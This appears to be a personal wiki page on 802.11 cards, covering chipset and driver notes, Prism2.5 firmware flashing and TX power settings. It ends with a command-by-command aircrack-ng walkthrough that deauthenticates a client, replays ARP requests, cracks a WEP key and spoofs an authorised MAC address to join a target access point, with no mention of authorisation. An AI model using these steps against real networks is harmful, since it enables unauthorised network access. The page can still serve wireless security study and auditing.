Wireless
From Ggl's wiki
Contents |
Some well supported 802.11 chipset
- Prism2.5
- 802.11b only, linux: wlanng or hostap (preferred) drivers (both are in the mainstream kernel) (kernel version >= 2.6.16 has to be patched with patch hostap-kernel-2.6.16.patch for packet injection and upgrade prism station firmware to at least v1.5.6)
- PrismGT
- 802.11b/g, linux prism54 drivers (patching recommended for packet injection)
- Atheros
- 802.11a/b/g, linux madwifi-ng drivers (has to patched for packet injection)
- Ralink
- (802.11b/g), linux rt2x00/rt2500 drivers (no patching required)
note: check aircrack-ng compatibility and drivers for details. Driver installation is explained in aircrack-ng install drivers.
I have three different chipsets through three PCMCIA pccard cards:
- Prism2.5 on a Senao Long range NL-2511CD PLUS EXT2 with a 5.5 dBi Omni antenna
- Atheros on a CB9-GP-EXT 802.11a/b/g External Antenna
- Ralink RT2500 on a Sitecom WL-112 802.11g
I'll primarily focus on Senao card.
Configuring and using the cards
Senao Long range NL-2511CD PLUS EXT2
Plugging the antenna
Take the card with the green led on top and the pcmcia connector on the right. Primary jack is the bottom one, and auxiliary/secondary jack is the top one. So, plug your antenna in the primary jack. If you have a second antenna, plug it into the secondary jack.
Improving Signal reception or transmission
See Senao NL-2511 on Townsville wireless and Senao Card on Seattle wireless.Chipset is a Prism2.5. To inject packets need hostap drivers to be patched.
To adjust TX power use the following commands:
iwpriv wlan0 alc 0 iwpriv wlan0 writemif 62 $VALUE
From townsville wireless Senao NL-2511 page:
"$VALUE is a signed integer between -127 and +127, however in the decimal layout that iwpriv uses, the numbers can look a little weird. Essentially, 127 means your power level is off, 0/255 is half-way, with 128 being full power. See the below ASCII art for more detail.
0%---------------50%---------------100%
127-------------0/255---------------128
It should be warned that more power is not always best. as some radios will "bleed" noise into the signal, not only making your SNR stay the same, but then also drowning quieter clients (Who perhaps are NOT the 200mW clients). This will reduce their effeciency, and it is possible to prevent someones association requests from being heard by the servicing AP.
Also, as this is a hack that changes chipset registers, there are some flaws, one being that the power level (checked by "iwpriv <IF> readmif 62") stays at a set level (Around 240 IME for the Senao 200mW Prism2.5 PCMCIA Cards). This will therefore not increase the chance of establishing a link, will only enhance a link already established.
It should also be noticed, this setting seems to take effect for a very short time. The cure for this is to create a script and execute it as a cron job every 1-5 minutes."
Ok so lower TX power means better sensitivity.
To get the best sensitivity, set a lower rate on the wlan0 interface:
$ iwconfig wlan0 rate 1M
Now the sensitivity is at -95 dBm.
Flashing the firmware
It use the following command to see which firmware version is loaded :
$ hostap_diag wlan0 NICID: id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)) PRIID: id=0x0015 v1.1.0 STAID: id=0x001f v1.4.9 (station firmware)
It should be better to update the firmware. Netgate Prism support provides firmwares.
I took the latest firmwares tarball. As explained by Jun Sun you can upgrade the primary and secondary (also called station) firmware). After unarchiving the tarball, you will have several directories. If you want to load the new firmware a the volatile memory (e.g. the ram) you use:
$ prism2_srec -r wlan0 <primary> <secondary>
The new firmwares are loaded until power off.
note: If you have a Debian kernel (2.6.16 for example), CONFIG_HOSTAP_FIRMWARE_NVRAM is not set a 'y' on default kernel. So you have to recompile the hostap module (in fact hostap and hostap_cs) with CONFIG_HOSTAP_FIRMWARE_NVRAM=y to be able to upgrade the non-volatile firmware.
If you want to put it on the non-volatile (e.g. nvram) you use:
$ prism2_srec -f wlan0 <primary> <secondary>
New firmares will survive on power off.
Test the compatibility of the firmwares:
$ cd Latest-prism $ prism2_srec wlan0 primary-FLASH/pf010101.hex secondary-FLASH/su010804.hex srec summary for pf010101.hex Component: 0x0015 1.1.1 (primary firmware) srec summary for su010804.hex Component: 0x001f 1.8.4 (station firmware) Verifying update compatibility and combining data: NICID was not found from the list of supported platforms. Incompatible update data.
These firmwares are not compatible with the card. Check until you get "OK" for the primary and the secondary firmwares.
$ prism2_srec wlan0 primary-FLASH/pk010101.hex secondary-FLASH/sf010804.hex srec summary for pk010101.hex Component: 0x0015 1.1.1 (primary firmware) srec summary for sf010804.hex Component: 0x001f 1.8.4 (station firmware)
Verifying update compatibility and combining data: Plug record length mismatch (PDR=0x0001): 12 != 16 ==> extend from default PRI: old iface 1:4-4 new iface 1:4-4 Could not find data position for plugging PDR 0x0413 at 0x0000118a (len=2) PDR 0x0413 is not in wlan card PDA and there is no default data. Ignoring plug record. Allowing S3 overlap due to CRC-16 signature at 0x007e17fe (was: ffff) OK.
Well, we found the good ones. So now use -f switch to actually upgrade the firmwares:
$ prism2_srec -f wlan0 primary-FLASH/pk010101.hex secondary-FLASH/sf010804.hex
Patching hostap drivers
Get enough privileges to patch the file in /usr/src/linux-`uname -r`/drivers/net/wireless/hostap/ (change user to root for example).
$ cd /usr/src/linux-`uname -r`/drivers/net/wireless/ $ patch --dry-run -p0 < /usr/local/files/wireless/aircrack-ng-0.6/hostap-kernel-2.6.16.patch
If you get no error, apply actually the patch:
$ patch --dry-run -p0 < /usr/local/files/wireless/aircrack-ng-0.6/hostap-kernel-2.6.16.patch
aircrack-ng tools
Set card into monitor mode and start airodump-ng to collect IVs
When all is done, it's time to play with aircrack-ng tools. The wiki is worth a look.
To use aireplay-ng and airodump-ng, set the wireless interface in monitor mode. With an Atheros chipset:
$ airmon-ng start wifi0
After use ath1 virtual interface. Start airodump-ng:
$ airodump-ng ath1
Get ESSID and an client ARP request
To get the essid and a arp request from a client use aireplay-ng:
$ aireplay-ng --deauth 1 -a <bssid> -c <client_mac_addr> ath1
Replay the capture ARP request
Ok, so now replay the captured arp request with a hight rate:
$ aireplay-ng -2 -r <capture_file> -x 1000 ath1
capture_file is usually replay_arp-<month><day>-<number>.cap
Crack the WEP key
If you want start aircrack-ng on the .ivs file that airodump-ng is generating and populating:
$ aircrack-ng -n 128 <ivs_file>
Bypass MAC filtering and associate yourself to the AP
So, now you have the wep key you can associate yourself to the target AP. Most personnal AP have MAC filtering enable (most of the dsl wireless modem/router in fact). So, juste change the MAC address of your card by one of an authorized client like the one you used to replay arp requests ;). For these purposes common wireless tools are used (check this memo to see the commands).
Prism2.5 card
With Prism2.5 cards it's easy:
$ ifconfig wlan0 hw ether 11:22:33:44:55:66
Associate to the target wlan:
$ iwconfig wlan0 mode managed $ iwconfig wlan0 essid <target_essid> $ iwconfig wlan0 key <cracked_wep_key> $ ifconfig wlan0 up
So now, you may have the BSSID in the field "Access Point" if your card has successfully associated itself to the target AP.
Atheros card
With Atheros cards, it's a little more tricky (see ChangeMacAddress for details). Insttall macchanger (debian has up-to-date packages):
$ apt-get install macchanger
Destroy VAPs automatically created and use macchanger:
$ wlanconfig ath0 destroy $ ifconfig wifi0 down hw ether 11:22:33:44:55:66 $ macchanger --mac=11:22:33:44:55:66 wifi0
Check:
$ macchanger --show wifi0
